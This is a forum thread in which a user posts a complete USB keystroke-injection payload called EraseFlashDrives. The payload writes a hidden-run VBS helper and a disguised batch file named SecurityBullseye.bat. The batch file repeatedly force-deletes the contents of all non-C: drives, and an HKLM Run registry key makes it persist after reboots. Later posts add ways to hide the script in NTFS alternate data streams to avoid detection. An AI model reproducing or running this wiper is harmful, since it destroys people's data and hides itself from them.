overwraith Posted December 22, 2012 Share Posted December 22, 2012 (edited) I have had a similar payload written for a while, but the stuff that the batch wiper link that Darren provided gave me a few new ideas. I learned how to make a registry key that would restart the batch file on reboot. Apparently this requires admin rights to run since it modifies the registry. You can test this payload on your own machine by replacing the directory and file removing commands with a dir command. I also found a better visual basic file for invisibly running batch files online. REM By overwraithREM EraseFlashDrives.txtREM PURPOSE: to delete the contents of attached drives.CONTROL ESCAPESTRING cmd /Q /D /T:7F /F:OFF /V:OFF /KDELAY 500ENTERDELAY 750ALT SPACESTRING MDOWNARROWREPEAT 100ENTERREM THE DIRECTORY YOU WANT TO HIDE THE SCRIPT INSTRING cd %TEMP%ENTERREM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.REM Delete vbs file if already existsSTRING erase /Q invis.vbsENTERREM FROM: [url="http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up"]http://stackoverflow...indows-boots-up[/url]STRING copy con invis.vbsENTERSTRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, FalseENTERCONTROL ZENTERREM Delete batch file if already existsSTRING erase /Q SecurityBullseye.batENTERREM Make the batch fileREM SLIGHT THROWBACK TO VIDEO GAME BIOSHOCK I/IISTRING copy con SecurityBullseye.batENTERREM REGISTRY KEY RESTARTS THE SCRIPT ON REBOOTSTRING REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Persistence /t REG_SZ /d "wscript.exe %TEMP%\invis.vbs %TEMP%\SecurityBullseye.bat" /fENTERSTRING :while1ENTERREM C:\ IS USUALLY THE DRIVE THE OS IS INSTALLED ON, SO OMIT.STRING for %%a in (A B D E F G H I J K L M N O P Q R S T U V W X Y Z) do (ENTERSTRING IF EXIST %%a:\ erase /Q /S /F "%%a:\*.*"ENTERSTRING IF EXIST %%a:\ rmdir /Q /S "%%a:\*"ENTERSTRING )ENTERSTRING timeout /t 60ENTERSTRING goto :while1ENTERCONTROL ZENTERREM RUN THE BATCH FILESTRING wscript.exe invis.vbs SecurityBullseye.batENTERSTRING EXITENTER[/CODE] Edited December 22, 2012 by overwraith Quote Link to comment Share on other sites More sharing options...
overwraith Posted December 22, 2012 Author Share Posted December 22, 2012 (edited) May throw in some alternate data stream stuff later. Can hide the batch file behind another file using a colon. The biggest problem would be extracting one file name via the command line, and changing the rest of the script accordingly. Another thing that could make it easier would be just making the file to attach the alternate data stream to, and making it appear to be something windows generated. File1.txt:SecurityBullseye.bat Would need specialized software like LADS or The Sleuth Kit to find it. Example... C:\Users\UserName>echo hello > File1.txtC:\Users\UserName>echo hello > File1.txt:SecurityBullseye.txtC:\Users\UserName>dir *.txt /BFile1.txtC:\Users\UserName>[/CODE] Edited December 22, 2012 by overwraith Quote Link to comment Share on other sites More sharing options...
overwraith Posted December 24, 2012 Author Share Posted December 24, 2012 Recently discovered that Windows 7 removed the ability to execute things from alternate data streams. http://superuser.com/questions/284406/how-do-i-execute-a-batch-file-in-an-alternate-data-stream-in-windows-7 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.